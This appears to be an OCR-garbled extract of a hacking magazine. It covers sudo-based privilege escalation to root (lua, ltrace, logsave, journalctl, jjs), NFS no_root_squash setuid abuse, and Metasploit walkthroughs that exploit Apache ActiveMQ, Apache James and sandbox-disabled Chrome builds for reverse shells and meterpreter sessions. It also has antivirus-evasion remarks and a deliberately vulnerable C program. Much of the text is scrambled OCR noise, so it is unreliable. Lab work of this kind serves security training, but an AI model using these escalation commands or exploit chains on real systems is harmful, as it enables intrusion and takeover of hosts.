,31(exim) ecm est mere et) Beary irb(main) :001:0> exec '/bin/bash lexec ‘/bin/bash' acm eek eet) rt) uid=0(root) gid=0(root) groups=0(root) V privilege html]# # 60. jis is tool is used to interpret one or multiple java script files luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) Cu cm ete ere me Rs Teer MEU Aste CSc OR xec('/bin/sh -c \$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitror()” | sudo j ig Rae cas eCcasa metas mmc Ome BT jjs> sh-4.2# id bs luid=0(root) gid=0(root) groups=0(root) sh-4.2# 61. journalct! journalct! command is used to view the logs collected by systemd service. [armour@ny privilege html]$ sudo journalctl sudo journalctl WARNING: terminal is not fully functional (press RETURN) !/bin/sh ES UE) sh-4.2# id re) Rem em el Lire) Berea |62. logsave lLogsave command will mand line program with specified arguments and save output to a logfile. [armour@ny privilege html]$ id Pty luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@my privilege html]$ sudo logsave /dev/null /bin/sh -i Eimer Cyne, SU eet [root@ny privilege html]# i Fy ee Rae) tern omTetet mee rT uid=0(root) gid=@(root) gr (root) [eco NPN RGIS Ed 63. Itrace trace program runs specified commands and records all dynamic library calls the command made [armour@ny privilege html]$ id id luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@ny privilege html]$ sudo ltrace -b -L /bin/sh sudo ltrace -b -L /bin/sh taco m et ene Let) sty luid=0(root) gid=0(root) groups=0( root) ec eae OES | lLua is a new programming language. id CSCC me CC em es Cee mes eCrst)) eu Com Teta Cee MO Me Mes ttl ards Gia sudo lua -e 'os.execute("/bin/sh") sh-4.2# id Ft luid=0(root) gid=0(root) groups=0(root) sh-4. 24 [armour@ny privilege html]$ COMMANI TET Oa Ue ea Te NERC MEM Me Meet tLe Se RU Sem Sec EY Cerner caren Came Uo ery COm este eC C] ie) luid=0(root) gid=0(root) groups=0(root) Rrra m eta Mc 0 rghese are the methods by which sudo privileges can be exploited on programs or command- ls to gain root privileges. However this is not the only way to do so. Before we go to other ste ps let's execute the PE.sh script of which we successfully modified privileges using SUDO privileges As already informed, PE.sh is a new Linux privilege escalation tool similar to LinEnum etc hat helps in finding out ways to escalate privileges. Our readers already had a glimpse of it lin the JAN 2020 Issue where it detected a dirtycow vulnerability in Vulnuni 1.01 CTF. Let's ru nit and feed the output to a file named PE.txt [armour@ny privil ae en aes he Pe.sh will create two separate files named Reports and passwordfiels.txt which have inf- lormation about the system and captured password (if any) respectively. Ertan mec cna) PE.sh PE.txt Reports _passwordfiles. txt fe will look at this two files later. Now, let us see the output of the script in PE.txt. The first in formation it shows is the kernel , hostname, system architecture and OS information Enc m e Ce: rae aess Cee ee eT (Stra Tetpat CA CeCe eee eee Cae Ee) mc ears Core Ua eee Cele) B. Kernel exploits IExploiting vulnerabilities in kernel is another important way of gaining root privileges. The pro blem with this method is that we rarely find vulnerable kernels. Our readers have seen a ker nel exploit recently in Lampiao : 1 CTF challenge (Hackercoo!Mag July2018 Issue) and th- e Vulnuni : 1.0.1 CTF challenge (HackercoolMag Jan2020 Issue). The vulnerability in both lf these instances was a DirtyCow kernel vulnerability. That's how rare they are. Even if you found a kernel vulnerability, we would suggest our readers to use them rar ely. Just because we have a kernel exploit ready, doesn't mean it works perfectly. DirtyCowxploit worked for us perfectly on the Lampiao : 1 CTF machine but not VulnUni : 1.01 CTF lmachine. It almost crashed the system in the latter one. Sometimes it may crash the system together even if you get root. However this particular kernel doesn't have any vulnerabilities. Feat CT) easter ees Eira tte cee aonb $ searchsploit 3.10.0 Exploit Title | Path | (/usr/share/exploitdb/) tra cae (cae Crtstc abun. EES eens Linux Kernel (owas Petstegeuny, eter mass Linux Kernel ria Peatsteygeutiy: eres mets Linux Kernel cma se Cr eteygeatiy i herr mets Linux Kernel nema ae Cratsteygeatnye yer er sekets Linux Kernel new auae exploits/Linux/dos/39542. txt Linux Kernel owas Peatstogeuny, errr mess Linux Kernel eA Mee COCs ere ons Linux Kernel (CentOS 7) - Denia | exploits/Linux/dos/41350.c Linux Kernel ere WA tegen ee mens Linux Kernel -229.x (CentOS / RH | exploits/Linux/dos/39556. txt Linux Kernel BU ete Mm tegen atin Uee La Linux Kernel 4.8.0-22/ Sra no eevAe UY Pye Lae t's scroll down the PE.txt fi eee acme as Strict user copy checks ae ROM cae) setae Uae Peete une acer perl es gt python Gir anaes lHere we have more information about the kernel. Did you realise what GCC stack protector ls? It is the functionality which protects the system from buffer overflow attacks (ok that was lan easter egg). We can also see programming languages present on the target system. Thisives US an idea as to which programming language fo use while coding an exploit in ca: we happen to find a vulnerability. The PE.sh specifically checks for the DirtyCow vulnerabi jas shown below. Mirage mess QOS Mc coe ae) PASS MIN DAYS © eco G Aa eam UD ed Check Passwords.txt File For Possible Scripts Have A Passwords am Co saCcmetd Se el eNom Sei Lel a Seca ogee Ly DOSER eAc eres eL ernie restr en ME OLR facet) CMa Gero trraa Reet eee elec ee rue aspect a ys yere ey Keer WLCie aCe Timi e ye ee eeu O eC Ce ura ius Te ts Ac ur Lin Vln ue ane Paras Pre LCr ey ePie LTE Oy Cera ira cam ere Home Directory Discovering ea eS tae es Dytreat stm Clan sae a ley Camm ttacie mot’ Dene ar my Greek omC east It also checks for contents in some of the directories like root directory, user's home directory and the Var directory. These are all stored in a separate directory named "Reports" while the iles that may contain passwords are stored in a file named passwordfiles.txt as shown below.pC eee og acon ets com TSN Re erate stCceog peer et ccmens apiece ee ect Le ctae) ea eiemetieeniriac eee Cea aaed Beem eetsce asec ee /etc/pki/tls/misc/CA reap etna cues ces ete a ces eos Gece e ld eimai epoca Cm ace eeu cu ee Te au cet ace Lg cept lHere is the Reports directory with more information. Puna ee CRs es moc iacy eee cme tC CRC ees Pe iS et eer Une Cy ened oe Cre Gea e ota Coon ong (nC Maen ae ae eee | irae Ga IEP BEL BC 36.130 él rd Per Getway IPs : 192.168 Vege as Curd ® aaa aaa ec) 5 eo eos) ear) eo eco) Ce eo) Cree Ee USF PE EBPE! ESTABLISHED ECO) SCPE ES PED) ESTABLISHEDhe Pe.sh script also provides network information of the target as shown in the above imag- e. As part of this, we can also see other systems connected to our target system using the A- IRP table. We can also see the connections on target system. The highlighted connections are the onnection we established after exploiting it. By seeing the port numbers on which the targe-| system is listening, we can get an idea what services are running on the target although in his case we already did a nmap scan. Exploiting applications running with root privileges However we have a chance of privilege escalation if the applications run with root privileges. here are three applications of interest here. SSH, MySQL and NFS. Let's see if any of them lis running with root privileges. The ps -aux command can be used as shown below to do th- re FEST: grep nf rt ur chy Ce cr) Here two applications SSH and NFS are running with root privileges. For exploiting SSH, we Imay need password, so let's try to exploit NFS. We use the show mount command to mount he shares on target system onto our attacker system. ee Crate IeT rd Ca ued ets Re Cree RC LE) s denied by server while mounting 192.168.36.142:/tmp hat failed. Wait. All hope is not lost yet. There is a file of interest to us on the target system. he /etc/exports file. This file contains a table of local physical file systems on an NFS server hat are accessible to NFS clients ( in this case, our attacker system). As usual, the contents bf this file are maintained by the server's system administrator (in this case root or super use- I") When we check the permissions of this file, it says although the owner of the file is root luser, the permissions of the file are set to 777, which means anybody could execute, read or rite to the file. So we make a new share (this time the home folder of the user “armour” in he /etc/exports file as shown below.eee ae mp *(rw,sync, insecure,no_root_squash,no_subtree check) [eee erga a Meta (eee att Twarwxrwx I root root 57 Mar 14 04:36 /etc/exports Cees aL eR eee eee Sy Gea ew oi Cee aes eect tmp *(rw, sync, insecure,no_root_squash,no_subtree_check) Te ae bash-4.25 ff INow, lets restart the nfs-server for the changes to take place. This should be done with root privileges. Hence we use sudo. Pee were sad ee ee oc aac eee bash-4.2$ ff hen on the attacker system, we run the same commands we ran earlier but this time we are lsuccessful in mounting the home folder onto our system. ee CELT Ty Samet eae C aC CReL wer rd rte ae $ mkdir /tmp/nfs3 $ sudo mount -t nfs 192.168.36.142:/tmp /tmp/nfs3 rom on mags ruc ed ce te Ree CRT st Cae ereeac y eee Ce Cree eu Vale) hen we move to the mounted directory /tmp/nfs3 and copy the bash binary into that mount las shown below and set a setuid bit to using +s option Pers) ee so Cee ee Ce ee Ce Coc) Se Ul re eee chmod: changing permissions of ‘bash’: Operation not permitted race clapeer) ee mee ceca crc ae mes rest Rete tee a as rts 1168776 May 5 22:43 ba: 2 ctl 1001 eee pt] rtd meses) sudo chmod +s bash In the /etc/exports file, there is an option called no_root_squash root_squash is the security feature of Unix/Linux that is used for NFs usually. When root_squash is set, an attacker cannot gain root privileges even if he executes NFS on as root on the target system. This feature simply prevents privilege escalationINow, on target system we move to the /home folder and execute the bash command as sho- mn below. t didn't work. Some error. But no need to worry. You remember at the beginning of this Chall enge we told you there are different type of shells. Let's use one of them "dash" Eee uo SSE eel ls -L peaC Ry sr-x 1 root root d (To Be Continued) |Q : While using Metasploit, most of the tim kes you use a reverse_tcp payload and an- a few times you use a bind_tcp payload. hat is the difference between them? JA: Good question. A bind_tcp payload tries to open a port on the target machine. But the problem is almost all the firewalls configure a Iuule that only some regularly used ports can be open (ex : 80, 443 etc). This results in the ailure of the exploit.In a reverse_tep payload, he connection is initiated from the target mac hine. This connection is most of the time initi- lated from a most uncommon port. Since the t arget machine is initiating the connection, th- Jere is less chance of it being blocked by a fire -walll. The only requirement is we need a liste ner on the attacker system to receive the inc- ming connection : While using Metasploit payloads, they antivirus. Itis the same with msfvenom pal -yloads. What is the use of Metasploit if pa -yloads can easily be detected? A:: Metasploit is a penetration testing tool use -d by pentesters as a standard. For creation o -f undetectable payloads, Metasploit has an e -nerypting and encoding feature that prevents the malware from being detected by anti mal- ware. But since Metasploit has been in the fiel -d for a long time, signature detection can eas| -ily detect metasploit payloads. So penetratio- n testers use other means to deliver malware (ex. Donut , recently). However, stilll Metasploit is still the standa| -1d tool of penetration testing because apart fr -om just payloads, it has many exploit module -s and a lot of other functionality that can reall -y prove handy for penetration testers. lare being easily detected as malware by pecansINSTALLIT Hello readers. You all know the first release of Kali Linux this year, Kali Linux 2020.1 has bee n released in the month of January. The latest version brought many changes like not giving ‘oot user by default and some new tools. Since we are using many docker containers in our penetration testing tutorials, we thought of bringing a howto on installing Docker in Kali Linux (2020.1. Note that Docker can only be installed on a 64 bit architecture so make sure your sy- [stem is a 64bit using command as shown below. hackercoolmagz@kali:~$ uname -a etre terete ee te ent etme ee Oe eeu hackercoolmagzakali:~$ lj Here are the commands to install Docker on Kali Linux2020.1 We thought it hackercoolmagz@kali:~$ curl -fsSL https: //download.docker.com/linux/debian/gpg | sudo pre csaet Poe eRe Ce Re eo out eect ie tee ee mo mort ee ee Pee ens e PC a eee errors e ts Om RO csr oT re rg Perce ieee gs | [seo oe kk wor ki Luin cee Pcs ee eee sect cee etg Pome SM eT re tee mecaeU stun nc eae Id ietrsrerotetee leer | [Rn ae Sear om eC eo eee Get:1 http: //ftp.harukasan.org/kali kali-rolling InRelease [30.5 kB] Rete me en ot eee ery ete] ras eam ee et Le ect mee) Get:5 http: //ftp-harukasan.org/kali kali-rolling/non-free amd64 Packages [198 kB] oat eee eee eu est ec ee Cee | Fetched 16.7 MB in 23s (738 kB/s) CST eee eee ete #ngine docker.io ~$ sudo apt-get remove docker docker-engine docker.io Cee ee eed Prien sassy Reading state information... Done Package ‘docker-engine’ is not installed, so not removed eT eC CR ors ee ee eu aero Ot ec oS ee Re ccc “$l sudo apt-get install docker-ce res LOU elo) etl s ee Building dependency tree Reading state information... Done POU este eee Oa ie etree ie eer tT RCN eter Linux-compiler-gcc-9-x86 linux-headers-5.5.0-kalil-amd64 Linux-headers-5.5.@-kalii-common Linux-headers-amd64 Linux-kbuild-5.5 pigz errs eretrrs aufs-dev menu The following NEW packages will be installed: ieee enter eteet eee Cee cae! Linux-compiler-gcc-9-x86 Linux-headers-5.5.@-kalil-amd64 Linux-headers-5.5.-kali1-common Linux-headers-amd64 Linux-kbuild-5.5 pigz rece eC Me ee eR Ma tree TeV eee een Miers tren After this operation, 446 MB of additional disk space will be used. Do you want to continue? [Y/n] § After Docker is successfully installed (it will take some time), run the following command to test if it is actually working. sudo docker run hello-world ere eee) TR Mer mee atresia enemereer metry caiceesst) OS eee) Shrew ertreS Ctr as eee e reese ESET) Status: Downloaded newer image for hello-world: latest CCR col ive ae eee UEC CR Oe sc ess aan Ar ee eee ae eC ae eee meee Cn Oe oe un kee ea RoC ca (amd64) eu eR RC Reo ee ey CeCe eae ee a mee Docker should successfully work now. To start the Docker service after booting the system. the command is as shown below. rd A ae ea ag -$ [More information about managing Docker images and containers has been given in our Feb 2019 Issue. Please refer to that IsMETASPLOIT THIS MONTH elcome to this month's Metasploit This Month feature. We are ready with the latest exploit Imodules of Metasploit Apache Activemg Directory Traversal Upload Module Apache ActiveMQ is according to its makers "the most popular open source, multi-protocol a-| Ind Java-based messaging server". Although it is built for multi OS support, this vulnerability an only be exploited for Windows versions. The above mentioned versions have a directory raversal vulnerability that can be exploited to upload a malicious payload on the target. This module uploads a java based payload as the software itself is java based. Let's tes + this exploit module. We have tested this exploit on Apache ActiveMQ 5.11.1 installed on O- Windows 10. Readers can download the software from our repository Start Metasploit and load the activemq_traversal_module as shown below. The Apache ctivemq runs with default credentials (admin : admin). By default, it runs on port 8161 Insf5 > use exploit/windows/http/apache_activemq_tr ET err) Insf5 exploit (windows /http/apache_activemq traversa em rst PCR SCC OtieUr yae 7 east mer eee Cr} Pru Ti aesstr Cornice Mae TSC Co el ee st At AC SU) urea See UNC Tas te ort}[...] ec a ORC RS OL) lentifier, or hosts file with syntax ara Cas ESSE Les ia ase) ce ced 5 Peet Caw eae: Innections TARGETURI / c Cee RC Lets Peta a VCO ste ra) vs Tite e metas es eR SCM eC Car alam tcp) eect i Mast rst) os The listen address (an interface may be spe tet) Lc met cun Tag oa m CU On)) > set rhosts 192.168} Ee rhosts => 192.168.36.1 exploit( ) > set host 192.168 136 . 130 LO seca Creel BEL) emo coed exes eu ea pty e C-Be | Pe as 3 U3 BU le: aCe Cd ea Tad ee eee ee PEE LY Crum net) Oi cst eo eng) Command shell session 1 opened (192.168.36.130:4444 -> 192.168.36.1:54051) al eee ee POL a) moi cc Microsoft Windows [Version 10.0. 18362.778] COCR eae eC a eC ema IC: \Users\nspadm\Downloads\apache-activemq-5.11.1-bin\apache-activemq-5.11.1>9] INote that we tested this with latest anti virus and with Windows Defender ON. Apache James File Write Exploit Upload Module TARGET: Apache James 2.3 TYPE: Remote FIREWALL: Not Applicable pache James is an open source SMTP and POP3 Mail server entirely written in Java. It can Iso be used as a NNTP news server. The above mentioned version of Apache James has a input validation vulnerability in the code that creates new users. This module exploits this vul- lherability by using directory traversal payload as the username. We have tested this module on a Centos target. Let's see how to install Apache James 2.3.2 on the target. On the Centos terminal, install bash-completion, Java and nmap-ncat as shown below. [root@localhost ~]# yum install bash-completion java-1.8.0-openjdk nmap-ncat erm OSM Ce osc Lamm CT esc ae arid Boe cet s ae eT) Se ee eee cee ee ee ssc aes * extras: mirrors.piconets.webwerks. in Cee ee cet)Cr eerste ae ee ee Re eR eee eee Cre) > Package java-1.8.0-openjdk-headless.x86_64 1:1.8.0.242.b08-0.el7_7 will be FuMT ete Sse mc sma tiscy Cs em Cee CT Cesc) rrStr) cE eee tL x86_64 1:1.8.0.242.b08-0.eL7_7 updates 293 k Updating for dependencies cE eee scan x86_64 1:1.8.0.242.b08-0.el7 Ta Transaction Summary Upgrade 1 Package (+1 Dependent package) Total download size: 32 M eevee AME tallation should finish as shown below. WE) Cee eee a es OCA PoC ee java-1.8.0-openjdk-headless.x86_64 1:1.8.0.242.b08-0.e17_7 (ee [root@localhost ~]# Bash completion is a bash command functionality that auto completes commands or arguments when users type partial commands or arguments. It is just like Google's autocomplete feature but this works on bash shell. This is used normally to increase effectiveness of work done by programmers xt, use curl to download the vulnerable ow curl -O https://archive.apache.org/dist/james/serverlapache-james-2.3.2.tar.gz sion of apache james. The command is oun ee Ri Pc een eae an oi ecu Td arene Coast eC Me eT ees CC ee a 100 7476k 100 7476k Cees 3 CREP ers perl atelursees | Once the download is finished, extract the archive and copy the entire extracted directory to Vopt directory. Then change the permissions of /opt/james-2.3.2/bin/*.sh to executable. Thenlocalhost ~]# tar ache-james-2.3.2.tar.gz [root@locathost ~]# cp -r james-2.3.2 /opt este eer ae Se CU ese ey UAE cee mee ee Meru eer eect acc Meer cu Beatty eae meee Me ue eee Reece es eee eet ner cum ieee eee eee cerca cae mest eee err --add-port=4555/tcp --permanent Arent [root@locathost ~]# If and enab! service ssc eC mC Las cy ystem]# sudo systemctl enable james mlink from /etc/systemd/system/multi-user.target.wants/james.service t TAUB cus Lua ee oe Cle MS rcsae ree raat Removed symlink /etc/systend/system/multi-user. target .wants/postfix. service [root@locathost system]# I load the apache_jame: module. Teresa ees Imsf5 exploit(linux/smtp/apache_james exec) > show options Module options (exploit/Linux/smtp/apache_james_exec) Pr ees Me Me apt rst) EO a mee) wr Ce Ce Ucar rsC ie Ot PC Ld yes ae eee Es Cet ribeye ration tool ates pet) no eae eM ee eke Cae ve The target host(s), range CIDR identifi ler, or hosts file with syntax 'file:' aa ray Nr The target port (TCP) Se oe aCe Re On LCT Eg ee) SRVPORT 8080 Nid AUC ee 1 een OCC) ee le no Negotiate SSL for incoming connections ssLcert no Path to a custom SSL certificate (defau ae Omir) SU no UCU mem eRe GAC Le ie reac Cg Cane CUO caT rcsTwo way RC cy rt taec ie oC Cem cst eer ill try the cron method first. Set the required options as shown below and check. Treo ces Eee Cs eee) rhosts => 192.168.36.140 Maeeoritets eroa oie ocr cea leverse tcp POMC eRe Cue CUar ec mcs) emer eoest ee | We will try the cron method first ire ites ceric rao! ier Cone ) > check Cee eC RC ae eee Ot 192.168.36.140:25 - Failed to remove payload message for user /../../../etc/cron.d' with password ' Running the module should giv Imsf5 exploit( ) > run Started reverse TCP handler on 192.168.36.130:4444 192.168.36.140:25 - Command Stager progress - 100.00% done (833/833 bytes) 192.168.36.140:25 - Waiting for cron to execute payload eRe Pos ard me Cee cele C Ly Meterpreter session 1 opened (192.168.36.130:4444 -> 192.168.36.140:33470) a| lary eee Leese eeeeL) pC ee ee RC or ea ee eto Pn Gee Teac SU) Cote atre Ca) es Pc ACM eC SCR SC RAUe Oe) ec ecca eee] BuildTuple : x86_64-Linux-musl eer acme AE Urd Pee teeta eC Se ee RC aC Cum Ce aCe mene Mesto) Gracie Tetcimeed |Imeterpreter > background eeu eos Cune ieee cone ) > set target 0 ren) aeeericota ) > run 192.168.36.140:25 - Command Stager progress - 100.00% done (833/833 bytes) yee eC Pee at ee eet eR Ce me em cT eg [!] 192.168.36.140:25 - You need to start your handler: ‘handler -H 192.168.36.1) Eee Melia cts len cigseciet ance) eos Ce ere cm rat Rensselaer Cer mete Daas et ee ee eC Mee me LS FrfMn' to fully clean up exploit artifacts ea! his you need to set a listener as shown below. ireertsts eet ows ey Teme acon eae iC meu ec ese) payload => Linux/x64/meterpreter/reverse tcp imsf5 exploit( ) > set Lhost 192.168.36.130 (Create Cre Cee) Iemorlee at ate ae CCT) igs y yy (PME eat es | fou will get a session only when a user logs into the target as this triggers the payload. So re| [start the target system you will be getting another shell as shown below. (cer itota eae eee ee Ce Pe EET) Sending stage (3012516 bytes) to 192.168.36.140 Meterpreter session 2 opened (192.168.36.130:4444 -> 192.168.36.140:33572) it 2620-04-23 14:27:66 +0530 ee eae TSO) onc PCr U re aere CC) PC eC Meee CRS A Uee 2) ary meee Tay Pe aeuls et ee CU a ee Reel UCC egid=0) @ localhost.lo... 192.168.36.130:4444 -> 192. 168.36.140 (192.168.36.140) 2 Det me eC a ee Real Um Sr Mee eC lua CeCe ELEY Te Meee RELIST [etree Pe eee)|TARGET: Google Chrome 73.0.3683.86 (64 bit) TYPE: Remote FIREWALL: ON |This and next two exploit modules remind me of the days when | used to download torrents. |For specific files we used to download, they used to provide a particular browser and sugges t us to use that browser only. If our readers didn't understand this, well, you will definitely un- \derstand this at the end of this exploit module. The above mentioned chrome version suffers from a delicate overflow. This exploit corru- [pts the length of a float in order to modify the backing store of a typed array. By doing this, th +e typed array can be used to read and write arbitrary memory. The exploit then uses WebAs sembly in order to allocate a region of RWX memory, which is then replaced with the payloa td. Array is an object used by Google Chrome. In this case, it is being overflowed. RWX |memory is that memory where Read, Write and Execute permissions are granted. It is} in this memory that the module loads its malicious payload which is then executed. |However this exploit only works when the sandbox feature of google chrome is disabled. Ver y soon this may be upgraded to bypass sandbox. This works on any operating system : Linu x, MacOS and Windows. However while testing we realized that this exploit is not working p- rfectly on Windows 10. This article is a test made on Windows 7 64 bit. Let's test this. Down load the vulnerable version of Google Chrome from our repository and install it on Windows I7 with internet disabled (otherwise google chrome will update automatically). Once Chrome is successfully installed, it's time to disable sandbox on it. Right click on the shortcut of Chrome on desktop and click on "Properties". as shown below. Sandboxing is a security mechanism that separates any running programs or code to prevent any damage to the system or software. This is done to prevent any untested or seemingly malicious programs from causing any damage to the system. This programs are allowed limited resources to execute their code and that involves restricted controls also.Ok. All set on the target system. Now load the chrome_array_map exploit. eRe CR Cees ee ee eT Perce Ct eee eee eee ee SC Ley Module options (exploit/multi/browser/chrome_array map) rrr acct erat eC a a) word RCC Ret CORUM ee a CE eee ere ee eo) Cae) oy CRC eect Oe SSL rer ir Negotiate SSL for incoming connections ssucert it re Rec ee estetc imc ice: Pee Oe eT) CN ir Lin ace een Ce CSc Cocos pemen) [Set the required options and run the module. This will start a listener as shown below. Insf5 exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpret ae nts) POC eC Ue er eae ee ieee Ces iee es ee eee eee em eae Sas CP eee e) ase ee tLe! fees Cts eee tees ee eee CLL Tete Gove est Ces Ree. te eee ee aL Se Pe) Utara eetL eel msf5 exploit (multi/browser/chrome_array_map) > run tte C eee aie et) rae ec ee ees Ce ae) ee ee ee Cae Cee ee REEL ey) Using URL: http://172.28.128.3:8080/ plied reFrom the target system's Chrome browser, type the IP address where our listener has been started, = e As soon as this is done, you should get a meterpreter session as shown below PArecrTeny riee e anr e ee UC steer Con a ete re pplewebKit/537.36 CMe Ce Se aE e See Seu OMe En ace Prete) 1 Parrot Certo aE ae SC Pc cme COUT SUE eC URI One 128.14:49164 (172.28.128.14) Google Chrome Sideeffect Confusion --no-sandbox Module his module exploits a vulnerability in Google Chrome 80.0.3987.87 (64 bit) exploiting which ‘orrupts the length of a float array (float_rel). This can be used to access out of bounds read land write on adjacent memory. This read and write is then used to modify a UInt64Array whi- h is used for reading and writing from absolute memory. Then the exploit uses WebAssemb! y to allocate a region of RWX memory which is then replaced with the payload shellcode However this exploit only works when the sandbox feature of google chrome is disabled ery soon this may be upgraded to bypass sandbox. Although it should work on any operatin g system like Linux, MacOS and Windows, we have tested this on Windows’. But it should /ork fine on Windows 10 also. Let's test this. Download the vulnerable version of Google Chrome from our repository land install it on Windows 7 with internet disabled (otherwise google chrome will update auto- natically), disable the sandbox on it using the same process we have used in the above module.Ok. All set on the target system. Now start Metasploit and lo- lad the chrome_jscreate_sideeffect exploit Insf5 > use exploit/multi/browser/chrome_jscreate_sideeffect Prec ed| ee str Module options (exploit/multi/browser/chrome_jscreate_sideeffect) cru est Mt Me ae tts SV ae) ro CCRC CUR Cea an address on the local machine or 0.0.0.0 aoe) oo TRC eee Oe eon false it Negotiate SSL for incoming connections ssLcert ory Ce ee mes steer OMG acti c ee Sauce) Tiscv ory Ce aM Rem eat ciies Feel) ISet payload and other required options and run the module. This will start a listener at the ad- ress as shown below. cee ona er CLR U eT.) ee es) POMC Ue cu eee ees) pexeeer Used Para ae Creel Eees) Fy Sade Ur ee tL Pe! Pree eer lcsea Errante Ta Pere peer Cone set Uhost 172.28.128.3 Uhost => 172.28.128.3 pre er TCsea run Seo Ot eee ee Co) ote Meee CeCe ce eee Cae ne Ce ee eRe EELS [+] Using URL: http://172.28.128.3:8080/ cece cree Mery Ceed IFrom the target system's Chrome browser, go to the url highlighted in the above image. As s- oon as this is done, you should get a meterpreter session as shown below. msf5 exploit( PGR EEE Pees aca eee Or A RRC Ue ee ee CoCo steer MC SCCM eet ee seed Mur Rc CMC EM aco mCw Cree eet eee} [+] Meterpreter session 1 opened (172.28.128.3:4444 -> 172.28.128.14:49168) at (tered ber erat.)Google Chrome < 70 Object.create --no-sandbox Module Here is another exploit related to Google Chrome. The above mentioned versions suffer from type confusion vulnerability in Chrome's JIT compiler. The Object.create operation in googl e chrome is used to cause a type confusion between a PropertyArray and a NameDictionary’ This is used to construct a arbitrary read/write memory primitive, which is further used to wri te shellcode into wx region of a WebAssembly object. However this exploit also only works when the sandbox feature of google chrome is disa pled. Very soon this may be upgraded to bypass sandbox. This works on any operating syste m : Linux, MacOS and Windows. However while testing we realized that this exploit is not /orking perfectly on Windows 10. This article is a test made on Windows 7 64 bit. Let's test this. Download the vulnerable version of Google Chrome from our repository and linstall it on Windows 7 with internet disabled (otherwise google chrome will update automatic ally). Once Chrome is successfully installed, disable the sandbox on it using the as already seen. Now start Metasploit and load the chrome_object_create exploit prresr estes eee ees Career ict ine teen ea Cemetery Module options (exploit/multi/browser/chrome_object_create) Pru Current Setting Required Description SRVHOST 0.0.0.0 oa eRe ae RCC UM eee ee el Ce cee et ee) Ea ae) yes eC eee cmt eae ier no Some eee ec eens no Percy ttre Oe oD aT cr) The URI to for th: PCRS Cas Peetu) et the payload and other required options and run the module. This will start a listener at the ri shown below. Imsf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/she ess) Coacoc! SO ryp PU es) Prettiest eee ee eat mcr luripath ry Pee Ct Ceee ee ene ee arte) t => 4455 Imsf5 exploit(multi/browser/chrome_object_create) > run Cte a eed but sry Cia eee! Using URL: http://172.28.128.3:8080/hcool etacs ree iceman ee eee sears) From the target system's Chrome browser, go to the url highlighted in the above image. As s- loon as this is done, you should get a command shell as shown below.Imsf5 exploit (multi/browser/chrome_object_create) > pipet et CMe See eC Ce RR MCT lws NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, Like Gecko) Chrome/69.0.3497.1) CORCICSUeEraeL Tens Er CS Creel) COR eaeers Cee aC es Peer Cr er) 8.128.14:49159) at Loit(multi/browser/chrome_object_create) Cran Information Connection 1 m Ur eet eee PE) CCC Gtr eeL Berl Bees) CeCe Crest erie Saeed) Starting interaction with 1 Orr ee Ue Ast eee TD) Copyright (c) 2009 Microsoft Corporation. All rights reserved NESE NET OPN Se Nee TOC eT en ens Letts Ce REL Cras Cd [That's all in Metasploit This Month for this month's Issue. We will be back with some more a- /esome modules on our Next Issue. TOOL OF THE MONTH kali Linux 2020.2 has been released and the makers have added a new tool named Nexinet. INextnet is a pivot point discovery tool. We have not yet covered pivoting in our Magazine but e will soon cover it. Let us see a brief info of pivoting until then. But before that let us tell yo} u about three types of network : Single Homed, Dual homed network and Multi homed netw- rk. A single homed network has a single network interface. Our readers have seen lot of the se networks (Ex. Most of our CTF machines. When we boot a CTF machine it is allotted a si gle network interface). Dual homed network is a network which has two network interfaces (Read Metasploitable Tutorials of this Issue). As our readers might have already guessed, m- lulti homed network is a network that has multiple network interfaces. So Nextnet is a tool that helps penetration testers to detect systems having more than o ne network interfaces in a network. This is how it works. lhackercoolmagz@kali $ ./nextnet 172.28.128.0/24 Ch pUraee ees ° proto": "udp", “prol st nets 168. 36.1", "192. 168.160.1", "19: CCC eC ORC er CC msc NU ae mee Core oo) Posen ee CeCe CeCe ee eee mc reir POSER EM ee ee eee SCT Crm eCT ee eee OCLC er aT le can see nextnet here found a system with IP 172.28.128.1 which is having a multi home- Jd network and its IP address in that particular network. We will see pivoting in our next Issue.- BUFFER OVERFLOW [Do you remember the new directory named "C" we created in our previous Issue to demonst late about the tool GNU Debugger. | want you to go again into that directory and code anoth- ler C program as shown below. You can aptly name it second.c. second.c - Eile Edit Search Qptions Help #include void main() nf char *sh_name; char *command; sh_name=(char*)malloc( 10) ; command=(char*)malloc (128) printf("Name which superhero you want to be:"); gets(sh_name) ; printf("Hello %s\n",sh_name) ; system( command) ; } After you finish coding it, compile the second.c program as shown below. magz@kali:~/C$ gcc second.c -g rr) In function ‘main vette acest iM iast im Caan eC Pu sti Ce ste ac sun aT essu mice include ‘’ or provide a declaratio ‘malloc’ mare) ACL eC) CI Raise este eet mast a ) oc esta ae eum ae as (METhe compilation should pop up many warnings. But as it is said, programmers worry about errors and not warnings. So for now just ignore the warnings. Now let me explain what this pr ogram does. This program is one of the popular programs used to demonstrate buffer overflow. We have introduced some modifications to it. Externally, it is a simple program which asks users las to which superhero they want to be and prints it back as shown below. Pee ce ee ee ce ere iste) lo Captain America 5 nd Pee ee ee cr) cians Corry oT] h superhero you want to be: Iron Man Now let me explain the internal code of this program line by line.Let's jump to the 4th and 5th line directly in which we created two characters 'sh_name' and ‘command’ with a pointer. The asterisk symbol signifies a pointer to a char variable. We use this when we have no idea wha length the string is going to be for the character. In the 6th and 7th line of the program, we have a C function named “malloc” which is used to allocate memory during runtime. As you ¢ an see, it allocates a memory of 10 and 128 bytes to 'sh_name' and ‘command’ respectively. ‘0 put simply, | have created two buffers here, one of 10 bytes and other of 128 bytes. Seeing where we are getting to? In the 8th line, the program prints the text as to who /our super hero is and collects user input using the "gets" command which reads input from fhe standard input and stores them as a C string. In the 9th line, it is printed back by prepend ing it with a "Hello" as we have already seen in the image above. The last line of the C progr am has the ‘system’ function which passes commands to command processor to be execute d. | hope you understood the function of this program, Now suppose a user ran the program and when prompted for his favorite super hero an| swered as shown below.Maybe he was a diehard (to the power of 7) fan of Captain America like me or he was an English language perfectionist who hated answering minimal answers. Whatever the user was, the program responded as shown below. It printed out the ans wer but it also printed something else, " he not found” with a ‘sh’ at the beginning. Pe ee 